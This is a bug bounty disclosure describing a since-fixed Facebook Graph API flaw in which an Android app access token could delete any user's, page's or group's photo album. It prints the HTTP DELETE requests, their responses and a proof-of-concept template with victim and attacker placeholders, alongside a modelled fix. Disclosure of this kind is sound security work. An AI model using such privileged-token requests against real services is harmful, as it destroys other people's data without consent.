What if your photos get deleted without your knowledge?

Obviously, that's very disgusting, isn't it? Yup, this post is about a vulnerability I found that allowed a malicious user to delete any photo album on Facebook. Any photo album owned by a user, a page or a group could be deleted.

The Graph API is the primary way for developers to read and write user data; all current Facebook apps use it. In general, the Graph API requires an access token to read or write user data. Read more about Graph API here.

According to the Facebook developer documentation, photo albums cannot be deleted through the album node in the Graph API.

I tried to delete one of my own photo albums using a Graph API Explorer access token.

Request :-

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEd…..MUZD

Response :-

{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete photo albums. But note the wording of the error message: it tells us that some other application does have the capability to make this API call 😛

I decided to try it with a Facebook for Android access token, because it is a top-level access token that has some extra permissions. Facebook's mobile apps use the same Graph API, so I took one of my album ids and my own Facebook for Android access token and tried again.

Request :-

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:-

true

Album 518171421550249 got deleted 😀 So what's the next step? I took a victim's album id and tried to delete it. I was very curious to see the result.

Request :-

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:-

true

OMG 😀 the album got deleted! So what? I had access to delete all of your Facebook photos (public photos, or any photos I could see) 😛 lol 😀

I immediately reported this bug to the Facebook security team. They were very fast in identifying the issue, and a fix was in place less than 2 hours after they acknowledged the report.
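The root cause visible in the requests above is that the album endpoint checked only whether the calling app had the capability to issue a DELETE, not whether the token's user actually owned the album. The following is an added example (not Facebook's code) that models both versions of that server-side check; the token fields, app names, album store and error bodies are constructed assumptions.

```python
# Models the authorization a Graph API "DELETE /{album_id}" handler needs.
# Two checks are involved: (1) is the calling app allowed to use this call
# at all, and (2) does the token's user own the album being deleted.
# Token fields, app names and sample albums below are constructed.
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessToken:
    app_id: str   # application the token was issued to
    user_id: str  # user who granted the token


@dataclass(frozen=True)
class Album:
    album_id: str
    owner_id: str  # user, page or group that owns the album


# Constructed: apps whose tokens may call DELETE on the album node.
APPS_WITH_ALBUM_DELETE = {"fb_android"}

# Constructed sample albums belonging to two different users.
ALBUMS = {
    "518171421550249": Album("518171421550249", "user_a"),
    "777000111222333": Album("777000111222333", "user_b"),
}

# Error body in the shape the page shows for a non-capable app.
NO_CAPABILITY = {"error": {"message": "(#200) Application does not have the "
                           "capability to make this API call.",
                           "type": "OAuthException", "code": 200}}
# Constructed generic refusal; does not reveal whether the album exists.
NOT_DELETABLE = {"error": {"message": "Album not found or not deletable."}}


def delete_album_vulnerable(token, album_id, albums):
    """Capability check only: any user holding a capable app's token can
    delete any album. This is the behaviour the page's requests exhibit."""
    if token.app_id not in APPS_WITH_ALBUM_DELETE:
        return NO_CAPABILITY
    if album_id not in albums:
        return NOT_DELETABLE
    del albums[album_id]
    return True


def delete_album_fixed(token, album_id, albums):
    """Capability check plus object-level authorization on the owner."""
    if token.app_id not in APPS_WITH_ALBUM_DELETE:
        return NO_CAPABILITY
    album = albums.get(album_id)
    if album is None or album.owner_id != token.user_id:
        return NOT_DELETABLE  # same reply for missing and foreign albums
    del albums[album_id]
    return True
```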

Read more about obtaining a Facebook for Android access token here: [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-

DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren't sure how to do it, please see this video: [How I Hacked Your Public Facebook Photos]


Acknowledgement of the fix and a reward of $12500 USD for reporting this vulnerability.


This vulnerability is completely fixed now.

I thank the Facebook Security Team for running the bug bounty program and for quickly fixing this issue 🙂

HALL OF FAME: https://www.facebook.com/whitehat/thanks

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015

I have also written a detailed article on different ways to make money online, including bug bounties; those who want to make a living this way should read the article and start earning income online.